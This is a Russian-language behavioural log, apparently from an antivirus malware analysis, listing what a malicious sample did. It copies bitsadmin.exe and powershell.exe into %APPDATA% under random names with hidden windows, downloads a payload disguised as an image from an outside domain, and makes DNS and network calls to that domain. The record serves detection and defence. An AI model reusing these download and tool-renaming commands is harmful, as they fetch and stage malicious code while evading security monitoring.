Техническая информация
- '%APPDATA%\qqpeqysl.exe' /transfer dLbjxA /download https://ndjambo.com/jaluma/02694661204/en.jpg %APPDATA%\en.jpg
- %APPDATA%\pqqpeqysl.exe
- %APPDATA%\qqpeqysl.exe
- 'nd##mbo.com':443
- DNS ASK nd##mbo.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\pqQpeQYSl.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\qQpeQYSl.exe' (со скрытым окном)
- '%APPDATA%\qqpeqysl.exe' /transfer dLbjxA /download https://ndjambo.com/jaluma/02694661204/en.jpg %APPDATA%\en.jpg' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\pqQpeQYSl.exe
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\qQpeQYSl.exe